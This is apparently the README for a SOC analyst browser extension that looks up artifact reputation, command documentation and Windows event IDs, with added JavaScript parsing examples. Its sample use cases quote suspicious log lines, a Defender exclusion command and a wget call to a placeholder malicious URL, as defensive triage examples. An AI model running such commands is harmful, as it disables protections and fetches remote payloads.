Swiftly transform data into useful intelligence by enabling SOC/cybersecurity analysts, system administrators, or incident responders to search and display an artifact's reputation, context, and documentation from the browser tab of the SIEM, EDR, or any other webpage.
This tool may reduce triage and investigation times and spares the analyst from manually searching for IP addresses, domains, file hashes, operating system commands, file names, event IDs, or any other string of characters across multiple browser tabs.
==============================
USAGE
==============================
1. From the web browser, select or highlight an artifact and right-click
2. Select "SOCMaster"
3. Click one of the options available
4. Menu will appear on lower right side containing information on the artifacts
===============================
MAIN FEATURES
===============================
1. IP/Domain/Hash using vendor API keys:
- Uses threat intelligence vendors such as AbuseIPDB, VirusTotal, and AlienVault OTX to obtain the reputation of and information on an IP address, domain, or hash. The data available depends on the vendor
2. Get OS command information and arguments (PowerShell, Windows, Linux OSX):
- Get information on over 3,300 PowerShell cmdlets (including modules), almost all Linux commands (man sections 1-8), all documented Windows commands, and OSX commands
- Shows information about operating system binaries and commands. This includes Windows commands such as ipconfig /renew "Local Area Connection" or PowerShell cmdlets (e.g. Set-ExecutionPolicy)
- Adding an argument to the OS command limits the data shown to the command description plus the information on that argument or switch, e.g. "/renew" for the Windows command ipconfig, "-r" for the Linux command rm, or "-AuthType" for the PowerShell cmdlet Disable-ADAccount
- To get full information on the OS command, omit any arguments/switches.
3. Get file information using file name (Windows/Linux):
- Retrieve information on known files such as "kernel32.dll" on Windows or "passwd" on Linux
4. Get event ID Information (Windows):
- Show documentation on a Windows Event Log using its Event ID
5. String search (Twitter, Google):
- Display Twitter or Google search results for any string of characters
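The argument-narrowing behaviour in feature 2 depends on splitting the highlighted text into a base command and its switches. The following is an added example, not SOCMaster's own code, showing one way to do that: it keeps quoted arguments such as "Local Area Connection" as one token, guesses the command family from the shape of the first token and the switch style (a heuristic, so a Windows command using dash switches will be reported as Linux), and reports whether the lookup should be narrowed to the switches or show the full command documentation.

```javascript
// Added example (not SOCMaster's own code): split a highlighted OS command
// into its base command and switches for a "Find command information" lookup.

// Tokenise on whitespace, keeping double- or single-quoted spans as one token.
function tokenize(text) {
  const tokens = [];
  const re = /"([^"]*)"|'([^']*)'|(\S+)/g;
  let m;
  while ((m = re.exec(text)) !== null) {
    tokens.push(m[1] ?? m[2] ?? m[3]);
  }
  return tokens;
}

// Heuristic family detection: Verb-Noun first token => PowerShell cmdlet,
// dash-style switches => Linux, slash-style switches => Windows.
// Checked in that order so a Linux path argument like /etc is not taken
// for a Windows switch.
function detectFamily(command, rest) {
  if (/^[A-Z][a-z]+-[A-Za-z]+$/.test(command)) return 'powershell';
  if (rest.some((t) => /^-{1,2}[A-Za-z]/.test(t))) return 'linux';
  if (rest.some((t) => /^\/[A-Za-z?]+$/.test(t))) return 'windows';
  return 'unknown';
}

// Returns what the documentation lookup should request. Per the README,
// any switch present narrows the output to the description plus that switch;
// no switches means the full command documentation.
function parseCommand(text) {
  const tokens = tokenize(text.trim());
  if (tokens.length === 0) return null;
  const [command, ...rest] = tokens;
  const family = detectFamily(command, rest);
  const switchRe = family === 'windows' ? /^\/[A-Za-z?]+$/ : /^-{1,2}[A-Za-z][\w-]*$/;
  const switches = rest.filter((t) => switchRe.test(t));
  return {
    family,
    command,
    switches,
    scope: switches.length > 0 ? 'switches-only' : 'full',
  };
}
```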
==============================
API KEY CONFIGURATION
==============================
To query an IP, domain, or hash using vendor API keys, the vendor's API key is required. Follow these steps:
1. Click Extensions icon in Google Chrome's upper right menu
2. Click the "SOCMaster" icon > Settings
3. On the settings page, on the upper right corner click "Add API key"
4. On intel source selection, select API key vendor
5. Paste Vendor API key on the API key field
6. Click save
7. The API key is now added; IP/Domain/Hash scans using vendor API keys can now be used
For the Twitter API, the bearer token is entered as the API key using the same configuration steps as above. A bearer token can be obtained by signing up for a Twitter developer account. More info here: https://developer.twitter.com/en/docs/authentication/oauth-1-0a/api-key-and-secret.
For VirusTotal, AlienVault, and AbuseIPDB, an account is required to obtain an API key.
==============================
SAMPLE USE CASE
==============================
1. Suspicious PowerShell logs show:
Set-MpPreference -ExclusionPath "C:\users\public\documents\sucmra"
A user can highlight the above command and select the "Find command information" option and will be able to view the syntax and parameters of the command.
2. Suspicious IP address from the firewall logs:
x.x.x.x
A user can highlight the IP and select the "IP scan using vendor API keys" option and will be able to view IP reputation and data from vendors.
3. Suspicious Linux command shows:
wget http://malicious_url -O
A user can highlight the above command and select the "Find command information" option and will be able to view the syntax and parameters of the command.
4. Windows Event IDs on the SIEM show:
eventID 4624
A user can highlight the event ID number and select the "Get event ID information" option and will be able to view the fields and description of the Windows event.
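The four use cases above each map a highlighted artifact to a different menu option. As an added example that is not SOCMaster's own code, the classifier below suggests which option fits a highlighted string: labelled event IDs ("eventID 4624"), IPv4 addresses, MD5/SHA-1/SHA-256 hashes, domains, and commands. The hash and domain option labels are assumptions (the README quotes only the IP, command, and event ID labels), and the sample values are constructed.

```javascript
// Added example (not SOCMaster's own code): suggest the SOCMaster menu
// option for a highlighted artifact. Labels marked "assumed" are not
// quoted in the README.
const OPTIONS = {
  eventId: 'Get event ID information',
  ip: 'IP scan using vendor API keys',
  hash: 'Hash scan using vendor API keys',     // assumed label
  domain: 'Domain scan using vendor API keys', // assumed label
  command: 'Find command information',
  string: 'String search (Twitter, Google)',
};

// Strict dotted-quad check: four numeric octets, each 0-255.
function isIPv4(s) {
  const parts = s.split('.');
  return parts.length === 4 &&
    parts.every((p) => /^\d{1,3}$/.test(p) && Number(p) <= 255);
}

function classifyArtifact(raw) {
  const text = raw.trim();
  // Event IDs are usually highlighted with their label, e.g. "eventID 4624";
  // a bare number is also treated as an event ID.
  const ev = text.match(/^(?:event\s*id\s*[:=]?\s*)?(\d{1,5})$/i);
  if (ev) return { kind: 'eventId', value: ev[1], option: OPTIONS.eventId };
  if (isIPv4(text)) return { kind: 'ip', value: text, option: OPTIONS.ip };
  // 32 / 40 / 64 hex characters => MD5 / SHA-1 / SHA-256.
  if (/^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$/i.test(text)) {
    return { kind: 'hash', value: text.toLowerCase(), option: OPTIONS.hash };
  }
  if (/^(?:[a-z0-9-]+\.)+[a-z]{2,}$/i.test(text)) {
    return { kind: 'domain', value: text.toLowerCase(), option: OPTIONS.domain };
  }
  // A command: a PowerShell Verb-Noun cmdlet, or a word followed by arguments.
  // A single bare word (e.g. "passwd") is ambiguous and is left to the user.
  if (/^[A-Z][a-z]+-[A-Za-z]+(\s|$)/.test(text) ||
      /^[a-z][\w.-]*(\s+\S+)+$/i.test(text)) {
    return { kind: 'command', value: text, option: OPTIONS.command };
  }
  return { kind: 'string', value: text, option: OPTIONS.string };
}
```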
==============================
CREDITS
==============================
This Chrome extension uses the following websites as reference data:
https://lolbas-project.github.io/
https://gtfobins.github.io/
https://ss64.com/
https://man7.org/
https://linux.die.net/
https://learn.microsoft.com/en-us/powershell/module/
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands
https://www.file.net
https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/
https://www.google.com
Michael Hingpit for help with UI